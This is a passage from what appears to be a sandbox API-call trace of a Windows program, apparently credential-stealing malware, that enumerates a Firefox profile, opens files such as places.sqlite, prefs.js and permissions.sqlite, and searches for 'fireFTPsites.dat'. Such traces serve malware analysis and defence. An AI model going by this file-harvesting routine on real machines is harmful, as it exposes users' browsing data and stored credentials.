dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.884] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39 [0590.884] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.884] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.885] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.885] CloseHandle (hObject=0x668) returned 1 [0590.885] CloseHandle (hObject=0x660) returned 1 [0590.885] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.885] LocalFree (hMem=0x56cab0) returned 0x0 [0590.885] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.885] lstrlenW (lpString="\\") returned 1 [0590.885] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.885] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.885] lstrlenW (lpString="mimeTypes.rdf") returned 13 [0590.885] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.885] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.885] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.885] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.885] CloseHandle (hObject=0x660) returned 1 [0590.885] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.885] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5dbdf0 [0590.885] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf", lpDst=0x5dbdf0, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf") returned 0x5a [0590.885] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.885] CloseHandle (hObject=0x660) returned 1 [0590.885] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.885] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xef3 [0590.885] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.885] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.886] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.886] CloseHandle (hObject=0x668) returned 1 [0590.886] CloseHandle (hObject=0x660) returned 1 [0590.886] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.886] LocalFree (hMem=0x56cab0) returned 0x0 [0590.886] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.886] lstrcmpiW (lpString1="minidumps", lpString2=".") returned 1 [0590.886] lstrcmpiW (lpString1="minidumps", lpString2="..") returned 1 [0590.886] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.886] lstrlenW (lpString="\\") returned 1 [0590.886] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.886] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.886] lstrlenW (lpString="minidumps") returned 9 [0590.886] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.886] LocalAlloc (uFlags=0x40, uBytes=0x12c) returned 0x63bbf0 [0590.886] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.886] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0590.886] lstrlenW (lpString="\\*.*") returned 4 [0590.886] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps") returned 85 [0590.886] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.886] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\minidumps\\*.*", lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0x5b9b50 [0590.886] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0590.886] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 1 [0590.886] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0590.886] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0590.886] FindNextFileW (in: hFindFile=0x5b9b50, lpFindFileData=0x52d878 | out: lpFindFileData=0x52d878) returned 0 [0590.886] FindClose (in: hFindFile=0x5b9b50 | out: hFindFile=0x5b9b50) returned 1 [0590.886] LocalFree (hMem=0x56cab0) returned 0x0 [0590.886] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.886] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.887] lstrlenW (lpString="\\") returned 1 [0590.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.887] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.887] lstrlenW (lpString="parent.lock") returned 11 [0590.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.887] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.887] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.887] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.887] CloseHandle (hObject=0x660) returned 1 [0590.887] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.887] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.887] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock") returned 0x58 [0590.887] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.887] CloseHandle (hObject=0x660) returned 1 [0590.887] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\parent.lock" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\parent.lock"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.887] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0590.887] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0590.887] CloseHandle (hObject=0x660) returned 1 [0590.887] LocalFree (hMem=0x63bd28) returned 0x0 [0590.887] StrStrIW (lpFirst="parent.lock", lpSrch="fireFTPsites.dat") returned 0x0 [0590.887] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.887] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.887] lstrlenW (lpString="\\") returned 1 [0590.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.887] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.887] lstrlenW (lpString="permissions.sqlite") returned 18 [0590.887] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.887] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x56cab0 [0590.887] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.887] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.887] CloseHandle (hObject=0x660) returned 1 [0590.887] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5f [0590.887] LocalAlloc (uFlags=0x40, uBytes=0x13e) returned 0x5dbdf0 [0590.887] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite", lpDst=0x5dbdf0, nSize=0x5f | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite") returned 0x5f [0590.887] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.887] CloseHandle (hObject=0x660) returned 1 [0590.888] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.888] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x10000 [0590.888] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.888] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.888] UnmapViewOfFile (lpBaseAddress=0x450000) returned 1 [0590.889] CloseHandle (hObject=0x668) returned 1 [0590.889] CloseHandle (hObject=0x660) returned 1 [0590.889] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.889] LocalFree (hMem=0x56cab0) returned 0x0 [0590.889] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.889] lstrlenW (lpString="\\") returned 1 [0590.889] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.889] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.889] lstrlenW (lpString="places.sqlite") returned 13 [0590.889] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.889] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.889] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.889] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.889] CloseHandle (hObject=0x660) returned 1 [0590.889] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.889] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5dbdf0 [0590.889] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite", lpDst=0x5dbdf0, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite") returned 0x5a [0590.889] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.889] CloseHandle (hObject=0x660) returned 1 [0590.889] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.889] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa00000 [0590.889] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.889] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3800000 [0590.985] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.985] LocalFree (hMem=0x56cab0) returned 0x0 [0590.985] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.985] lstrlenW (lpString="\\") returned 1 [0590.985] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.985] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.985] lstrlenW (lpString="pluginreg.dat") returned 13 [0590.985] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.985] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x56cab0 [0590.985] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.985] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.986] CloseHandle (hObject=0x660) returned 1 [0590.986] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x5a [0590.986] LocalAlloc (uFlags=0x40, uBytes=0x134) returned 0x5dbdf0 [0590.986] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat", lpDst=0x5dbdf0, nSize=0x5a | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat") returned 0x5a [0590.986] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.986] CloseHandle (hObject=0x660) returned 1 [0590.986] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.986] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc91 [0590.986] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.986] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.986] LocalFree (hMem=0x5dbdf0) returned 0x0 [0590.986] LocalFree (hMem=0x56cab0) returned 0x0 [0590.986] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.986] lstrlenW (lpString="\\") returned 1 [0590.986] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.986] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.986] lstrlenW (lpString="prefs.js") returned 8 [0590.986] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.986] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bbf0 [0590.986] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.986] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.986] CloseHandle (hObject=0x660) returned 1 [0590.987] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x55 [0590.987] LocalAlloc (uFlags=0x40, uBytes=0x12a) returned 0x63bd28 [0590.987] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js", lpDst=0x63bd28, nSize=0x55 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js") returned 0x55 [0590.987] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.987] CloseHandle (hObject=0x660) returned 1 [0590.987] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.987] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1540 [0590.987] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.987] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.987] LocalFree (hMem=0x63bd28) returned 0x0 [0590.987] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.987] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 | out: lpFindFileData=0x52daf0) returned 1 [0590.987] lstrlenW (lpString="\\") returned 1 [0590.987] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default") returned 75 [0590.987] LocalAlloc (uFlags=0x40, uBytes=0x11a) returned 0x63d7d8 [0590.987] lstrlenW (lpString="search.json") returned 11 [0590.987] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\") returned 76 [0590.987] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bbf0 [0590.987] LocalFree (hMem=0x63d7d8) returned 0x0 [0590.987] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.988] CloseHandle (hObject=0x660) returned 1 [0590.988] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x58 [0590.988] LocalAlloc (uFlags=0x40, uBytes=0x130) returned 0x63bd28 [0590.988] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json", lpDst=0x63bd28, nSize=0x58 | out: lpDst="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json") returned 0x58 [0590.988] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.988] CloseHandle (hObject=0x660) returned 1 [0590.988] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x660 [0590.988] GetFileSize (in: hFile=0x660, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4183 [0590.988] CreateFileMappingW (hFile=0x660, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x668 [0590.988] MapViewOfFile (hFileMappingObject=0x668, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x450000 [0590.988] LocalFree (hMem=0x63bd28) returned 0x0 [0590.988] LocalFree (hMem=0x63bbf0) returned 0x0 [0590.988] FindNextFileW (in: hFindFile=0x57c9a0, lpFindFileData=0x52daf0 